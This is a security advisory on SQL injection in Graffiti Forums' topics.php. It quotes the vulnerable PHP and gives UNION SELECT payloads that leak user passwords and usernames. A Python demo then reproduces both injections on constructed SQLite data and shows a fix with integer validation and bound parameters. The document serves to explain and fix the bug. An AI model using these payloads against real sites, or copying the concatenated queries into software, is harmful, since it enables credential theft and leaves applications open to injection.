1) vulnerable code:

==[ topics.php ]=============================

$sql = "SELECT forum FROM graffiti_forums WHERE id=$f";
$result = mysql_query($sql);
$sql_row = mysql_fetch_row($result);
$forum_title = $sql_row[0];
[...]

==[ end topics.php ]=========================

As we can see, the value of $f goes into the SQL query with no filtering at all: it is neither escaped nor checked to be a number. Because it is interpolated outside of quotes, not even a single quote is needed to break out of the query. We also have to say that the script only works with register_globals on, so $f is taken directly from the request. This way, we can put in the $f variable something like:

2 UNION SELECT password as forum FROM graffiti_users

So the SQL query looks like this:

SELECT forum FROM graffiti_forums WHERE id=2 UNION SELECT password as forum FROM graffiti_users

Here, 2 is a valid forum id. Note that only the first row of the result is read into $forum_title, so which row you get back depends on the order of the result set. Using some ORDER BY clauses you can get different things... check it out.

2)

==[ topics.php 21-32 ]=======================

[...]
if (!$option){
    $sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" . $f;
    if ($result = mysql_query($sql)){
        echo("<center><table width=400 border=1>");
        while ($sql_row = mysql_fetch_row($result)){
            echo("<tr>");
            echo("<td>");
            $id = $sql_row[0];
            $topic = $sql_row[1];
            echo("<font face='Arial' size=3>");
            echo("<img src='./graphics/paper.gif' border=0> &nbsp;<a href='messages.php?t=$id&f=$f'>$topic</a>");
            echo("</font>");
[...]

==[ end topics.php ]=========================

In the SQL query of this code we can see the same bug. The exploitation is very similar to the first one:

topics.php?f=2 UNION SELECT password as topic, username as id FROM graffiti_users

The final SQL query looks like this:

SELECT id, topic FROM graffiti_topics WHERE id_forum=2 UNION SELECT password as topic, username as id FROM graffiti_users

Here, 2 is a valid forum id. The column names of a UNION come from the first SELECT, so the aliases in the injected part do not matter: $id receives the password and $topic the username, and since the loop prints every row as a link, this query dumps all users in one page. Once again you can play with some ORDER BY or GROUP BY clauses.
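The following is an added example, not code from the advisory or from Graffiti Forums. It rebuilds the two topics.php queries above against an in-memory SQLite database with a constructed copy of the three tables named in the advisory (graffiti_forums, graffiti_topics, graffiti_users; all rows and passwords are made up), runs both injections to show what each query leaks, and puts a fixed version next to them. Why the ORDER BY hint matters for the first query (only one row is ever read) and why the second query dumps every user at once are both visible in the returned values. The function names are my own; the fix uses a strict integer check plus a bound parameter, which is the equivalent of casting $f to int and using a prepared statement in PHP.

```python
import re
import sqlite3

# Constructed schema and data mirroring the table/column names used by topics.php.
# Every value here is invented for the demo.
SCHEMA = """
CREATE TABLE graffiti_forums (id INTEGER PRIMARY KEY, forum TEXT);
CREATE TABLE graffiti_topics (id INTEGER PRIMARY KEY, id_forum INTEGER, topic TEXT);
CREATE TABLE graffiti_users  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO graffiti_forums VALUES (1, 'General'), (2, 'Security');
INSERT INTO graffiti_topics VALUES (10, 2, 'Welcome'), (11, 2, 'Rules');
INSERT INTO graffiti_users  VALUES (1, 'admin', 'pa55word'), (2, 'bob', 'letmein');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def forum_title_vulnerable(conn, f):
    """Same shape as the first topics.php query: $f concatenated into the SQL,
    and only the first row of the result is read (mysql_fetch_row called once)."""
    sql = "SELECT forum FROM graffiti_forums WHERE id=" + f
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def topic_list_vulnerable(conn, f):
    """Same shape as the second topics.php query: every row is rendered as a link,
    so every row of a UNIONed result is shown to the attacker."""
    sql = "SELECT id, topic FROM graffiti_topics WHERE id_forum=" + f
    return conn.execute(sql).fetchall()


def parse_forum_id(f):
    """Whitelist check: a forum id is a decimal integer and nothing else.
    Anything like '2 UNION ...' is rejected before it gets near the database."""
    if not isinstance(f, str) or re.fullmatch(r"[0-9]+", f) is None:
        raise ValueError("forum id must be a positive integer")
    return int(f)


def forum_title_safe(conn, f):
    """Fixed form of the first query: validated integer bound as a parameter."""
    row = conn.execute(
        "SELECT forum FROM graffiti_forums WHERE id=?", (parse_forum_id(f),)
    ).fetchone()
    return row[0] if row else None


def topic_list_safe(conn, f):
    """Fixed form of the second query."""
    return conn.execute(
        "SELECT id, topic FROM graffiti_topics WHERE id_forum=?", (parse_forum_id(f),)
    ).fetchall()


# Payloads from the advisory. The first one carries an ORDER BY so that the
# injected row is deterministically the one that lands in $forum_title; without it
# the engine is free to return the real forum title first and the leak is invisible.
PAYLOAD_TITLE = "2 UNION SELECT password as forum FROM graffiti_users ORDER BY forum DESC"
PAYLOAD_TOPICS = "2 UNION SELECT password as topic, username as id FROM graffiti_users"


def run_demo():
    conn = open_db()
    out = {
        "title_normal": forum_title_vulnerable(conn, "2"),
        "title_injected": forum_title_vulnerable(conn, PAYLOAD_TITLE),
        # Column order comes from the first SELECT: tuple is (id, topic), so the
        # password ends up in $id and the username in $topic.
        "topics_injected": topic_list_vulnerable(conn, PAYLOAD_TOPICS),
        "title_safe": forum_title_safe(conn, "2"),
    }
    try:
        forum_title_safe(conn, PAYLOAD_TITLE)
        out["safe_rejects_payload"] = False
    except ValueError:
        out["safe_rejects_payload"] = True
    return out


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "=>", v)
```

Running it shows "Security" for the honest request, a password where the forum title should be for the ORDER BY variant, the full user list mixed into the topic rows for the second payload, and a ValueError from the fixed version before any SQL is executed.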